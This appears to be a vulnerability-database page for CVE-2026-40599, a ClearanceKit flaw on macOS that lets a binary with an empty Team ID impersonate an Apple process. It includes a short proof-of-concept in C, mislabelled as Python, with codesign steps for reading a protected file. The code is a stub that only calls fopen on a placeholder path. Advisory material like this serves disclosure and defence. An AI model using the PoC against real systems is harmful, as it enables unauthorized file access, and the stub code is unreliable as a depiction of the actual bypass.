Security Vulnerability Report
中文
CVE-2026-40599 CVSS 7.1 HIGH

CVE-2026-40599

Published: 2026-04-21 18:16:52
Last Modified: 2026-04-24 20:50:43
Source: [email protected]

Description

ClearanceKit intercepts file-system access events on macOS and enforces per-process access policies. Prior to 5.0.5, ClearanceKit incorrectly treats a process with an empty Team ID and a non-empty Signing ID as an Apple platform binary. This bug allows a malicious software to impersonate an apple process in the global allowlist, and access all protected files. This vulnerability is fixed in 5.0.5.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:craigjbass:clearancekit:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
ClearanceKit < 5.0.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * PoC for CVE-2026-40599: ClearanceKit Privilege Bypass * * Concept: To exploit this, compile a binary with an empty Team ID * but a non-empty Signing ID. ClearanceKit < 5.0.5 will treat this * as an Apple platform binary. * * Compilation steps (macOS): * 1. clang -o poc_exploit poc_exploit.c * 2. codesign -s "-" --force ./poc_exploit (Ad-hoc signing may trigger specific conditions, * or use a cert with no Team ID) */ #include <stdio.h> #include <stdlib.h> int main() { printf("[+] Starting PoC for CVE-2026-40599\n"); // Attempt to access a protected file path // This would normally be blocked by ClearanceKit for non-Apple processes const char* protected_file = "/System/Library/Protected/TargetFile"; FILE *fp = fopen(protected_file, "r"); if (fp) { printf("[!] SUCCESS: Accessed protected file: %s\n", protected_file); printf("[!] ClearanceKit failed to block the process.\n"); fclose(fp); } else { printf("[-] Failed to access file (may not exist or patched).\n"); } return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40599", "sourceIdentifier": "[email protected]", "published": "2026-04-21T18:16:51.693", "lastModified": "2026-04-24T20:50:42.683", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ClearanceKit intercepts file-system access events on macOS and enforces per-process access policies. Prior to 5.0.5, ClearanceKit incorrectly treats a process with an empty Team ID and a non-empty Signing ID as an Apple platform binary. This bug allows a malicious software to impersonate an apple process in the global allowlist, and access all protected files. This vulnerability is fixed in 5.0.5."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:craigjbass:clearancekit:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.0.5", "matchCriteriaId": "FE778DA8-51A8-4F52-B888-A0242BD70CCA"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}]}]}], "references": [{"url": "https://github.com/craigjbass/clearancekit/security/advisories/GHSA-w253-42qp-5f2x", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/craigjbass/clearancekit/security/advisories/GHSA-w253-42qp-5f2x", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.